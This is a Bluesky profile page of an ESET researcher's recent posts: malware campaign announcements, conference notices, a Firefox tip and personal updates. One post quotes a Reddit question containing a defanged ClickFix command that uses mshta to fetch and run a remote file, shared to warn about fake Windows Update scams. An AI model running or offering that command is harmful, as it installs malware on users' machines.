Aryeh Goretsky's Avatar

Aryeh Goretsky

@goretsky.bsky.social

@ESET Distinguished Researcher | alum of McAfee, Microsoft MVP, Tribal Voice, Zultys | Mod @Lenovo, @Neowin.Net, Scots Newsletter forums | Intel Insider Council | Repost ≠ endorse

973 Followers  |  3,260 Following  |  102 Posts  |  Joined: 07.02.2024  |  1.8427

Latest posts by goretsky.bsky.social on Bluesky

What is this "cmd /c start mshta "http[:]//195[.]133[.]9[.]111/swear[.]odd" and how can i deal with this? Posted in r/antivirus by u/remimages • 1 point and 4 comments

Interesting. Seems ClickFix/Fake CAPTCHA scams are migrating to fake Windows Update messages:
old.reddit.com/r/antivirus/...

06.12.2025 08:18 — 👍 1    🔁 0    💬 0    📌 0

#ESETresearch analyzed the #Gamaredon VBScript payload recently flagged by @ClearskySec. It wipes registry Run keys, scheduled tasks, and kills processes – however, our assessment is that this is likely to clean researchers’ machines, not a shift to destructive ops. x.com/ClearskySec/... 1/4

05.12.2025 08:49 — 👍 4    🔁 2    💬 1    📌 0
Preview
MuddyWater: Snakes by the riverbank MuddyWater targets critical infrastructure in Israel and Egypt, relying on custom malware, improved tactics, and a predictable playbook.

#ESETresearch discovered a new #MuddyWater campaign targeting critical infrastructure in 🇮🇱 Israel and 🇪🇬 Egypt, using a new backdoor – MuddyViper – and a variety of post-compromise tools www.welivesecurity.com/en/eset-rese... 1/7

02.12.2025 11:42 — 👍 6    🔁 6    💬 1    📌 0
Post image

#ESETresearch is heading to #AVAR2025? Dec 4, Thursday in Kuala Lumpur, 11:00–11:30 MYT.
ESET researchers Anton Cherepanov & Peter Strýček present: "Sniffing Around: Unmasking the LongNosedGoblin operation in Southeast Asia and Japan”. 1/3

01.12.2025 13:39 — 👍 3    🔁 3    💬 1    📌 0
Post image Post image

NEW: Israeli and Arab media have reported that Iran is prepared to expand an Israel-Hezbollah conflict regionally if Israel launches operations against Hezbollah. 🧵(1/4)

Full update: isw.pub/IranUpdate12...

02.12.2025 01:28 — 👍 99    🔁 24    💬 5    📌 2

Oof… you're right. It's flagged as an impersonation account.

01.12.2025 01:45 — 👍 1    🔁 0    💬 0    📌 0
Post image Post image

I don't normally have a lot to say about my Congressperson Jeff Crank, but kudos to him & his staff for this mailing; the holidays are prime time for scammers to prey on people & this is a good reminder.
Only thing I'd add is a link to @cisa.bsky.social, since so much crime takes place online now.

30.11.2025 09:22 — 👍 1    🔁 0    💬 1    📌 0
Preview
Trip Report: BSidesCOS 2025 If you go on a business trip, it is bring value to your employer in some way. As an antivirus researcher, my business trips are typically to conferences, and what I am expected to bring back is kno…

My trip report for #BSides Colorado Springs 2025 computer security conference is now live at goretsky.wordpress.com/2025/11/26/t....

If you don't know what a trip report is, or are interested in what happened at this year's #BSides, perhaps you'll find this of interest.

26.11.2025 22:16 — 👍 2    🔁 0    💬 0    📌 0
Post image

#ESETresearch discovered unique toolset, QuietEnvelope, targeting the MailGates email protection system of Taiwanesw co OpenFind. The toolset was uploaded in an archive, named spam_log.7z, to VirusTotal from Taiwan. It contains Perl scripts, 3 stealthy backdoors, argument runner, and misc files. 1/8

24.11.2025 17:57 — 👍 11    🔁 11    💬 1    📌 0

My in-depth (~15 page) review of the #Lenovo #ThinkPad X9 15 Gen 1 Aura Edition after 6+ months of use is now up on @neowin.net!

#ThinkPadThursday #LenovoIN

21.11.2025 22:12 — 👍 2    🔁 0    💬 0    📌 0
Preview
PlushDaemon compromises network devices for adversary-in-the-middle attacks ESET researchers have discovered a network implant used by the China-aligned PlushDaemon APT group to perform adversary-in-the-middle attacks.

#ESETresearch discovered and analyzed a previously undocumented malicious tool for network devices that we have named #EdgeStepper, enabling China-aligned #PlushDaemon APT to perform adversary-in-the-middle to hijack updates to deliver malware. www.welivesecurity.com/en/eset-rese... 1/5

19.11.2025 10:12 — 👍 13    🔁 8    💬 1    📌 0

Glad to be of assistance. Hopefully @mozilla.org will take notice and remove this feature or at least make it opt-in by *default*.

18.11.2025 00:33 — 👍 1    🔁 0    💬 0    📌 0

Looks like @mozilla.org has added a new feature to #Firefox, the ability to search for images via #Google Lens when right-clicking on them.

Anyways, to disable it, go to "about:config" in the address bar and set browser.search.visualSearch.featureGate to "false"

17.11.2025 04:47 — 👍 4    🔁 0    💬 1    📌 0
Post image

#ESETresearch identified an active campaign distributing #NGate – Android NFC relay malware used for contactless payment fraud – targeting Brazilian users.
It is available for download via fake Google Play sites mimicking 4 major banks and 1 e-commerce app. 1/4

06.11.2025 14:00 — 👍 3    🔁 3    💬 1    📌 0

David Harley was a brilliant writer, illustrator, and musician. More importantly, he was a good friend, and he will be missed. The world was a much brighter place for having him in it, and his passing diminishes us all.

14.11.2025 03:02 — 👍 5    🔁 0    💬 0    📌 0

@chucktingle.bsky.social, @sparklespanx.bsky.social provides the best recommendations for reading, so I'm definitely going to look into your books, but I'm a bit confused about where to start since there's such a large body of work. Do you have a reading order guide?

14.11.2025 02:32 — 👍 0    🔁 0    💬 0    📌 0
UA Canceled Flight List for November 07, 2025; November 08, 2025; November 09, 2025 Posted in r/unitedairlines by u/zman9119 • 848 points and 126 comments

List of #United UA cancelled flights Nov 7-9: old.reddit.com/r/unitedairl...

07.11.2025 17:36 — 👍 1    🔁 0    💬 0    📌 0

I was a guest on @secureiqlab.bsky.social's Reining in the Cloud #podcast. Listen in as I talk about the end of support for Windows 10 and what that means: www.spreaker.com/episode/wind...

28.10.2025 03:13 — 👍 2    🔁 0    💬 0    📌 0

Interesting move.

23.10.2025 23:15 — 👍 3    🔁 1    💬 0    📌 0

For those in+around Hamburg 🇩🇪 the 39th Chaos Communication Congress (aka 39C3) is December 27-30:
events.ccc.de/congress/202...

23.10.2025 07:52 — 👍 2    🔁 0    💬 0    📌 0

#ESETresearch discovered a new wave of the well-known North Korea-aligned Lazarus campaign Operation DreamJob, now targeting the drone industry.
welivesecurity.com/en/eset-rese... 1/9

23.10.2025 04:10 — 👍 9    🔁 9    💬 1    📌 2

A trillion web pages is a lot of web pages.

Still, there's so much pre-internet content that never got archived. I've donated a few items to @archive.org and @mediaarchaeology.bsky.social to help ensure they get preserved.

If you have old files, maybe you can arrange to upload them, too.

23.10.2025 00:34 — 👍 2    🔁 0    💬 0    📌 0
Preview
Foreign hackers breached a US nuclear weapons plant via SharePoint flaws A foreign actor infiltrated the National Nuclear Security Administration’s Kansas City National Security Campus through vulnerabilities in Microsoft’s SharePoint browser-based app, raising questions a...

A foreign actor infiltrated the National Nuclear Security Administration’s Kansas City National Security Campus using vulnerabilities in Microsoft’s SharePoint browser-based app, raising questions about the need to solidify further federal IT/OT security protections www.csoonline.com/article/4074...

21.10.2025 03:12 — 👍 3    🔁 1    💬 0    📌 0
APWG Unifying The Global Response To Cybercrime

The APWG's eCrime summit is coming up on Nov 3-7 in San Diego. This looks like a good opportunity to find out what's going on in the #cybercrime landscape: apwg.org/events/ecrim...

16.10.2025 05:08 — 👍 2    🔁 0    💬 0    📌 0
BSides: Colorado Springs

For my Colorado-based followers, the BSidesCOS.org security conference is coming up in just under 2 weeks.

Registration is free, includes a t-shirt, there's even a movie afterwards. But you first have to register…

14.10.2025 00:08 — 👍 0    🔁 0    💬 0    📌 0
Preview
Cracker Barrel Outrage Was Almost Certainly Driven by Bots, Researchers Say Doesn't that make more sense than lots of people caring about Cracker Barrel?

gizmodo.com/cracker-barr...

10.10.2025 04:48 — 👍 26    🔁 4    💬 2    📌 1

Game publishers take note.

08.10.2025 21:07 — 👍 1    🔁 0    💬 0    📌 0

Asterix and Obelix weren't something common in the US when I was growing up. I did read some Tintin books, though, as a kid.

06.10.2025 07:14 — 👍 0    🔁 0    💬 1    📌 0
Aryeh Goretsky (@goretsky@infosec.exchange) I stumbled into a case of coordinated platform manipulation on Reddit yesterday. Political. One reads about these kinds of things all the time, but it is interesting seeing one happen right in front...

So, I stumbled across a coordinated influence/platform manipulation operation on #reddit:
infosec.exchange/@goretsky/11...

06.10.2025 04:21 — 👍 1    🔁 0    💬 0    📌 0
Bighorn sheep.

Bighorn sheep.

Also bighorn sheep, but blurry because zoomed in.

Also bighorn sheep, but blurry because zoomed in.

Went to the park today and saw bighorn sheep doing bighorn sheep things.

05.10.2025 06:00 — 👍 2    🔁 0    💬 0    📌 0

@goretsky is following 16 prominent accounts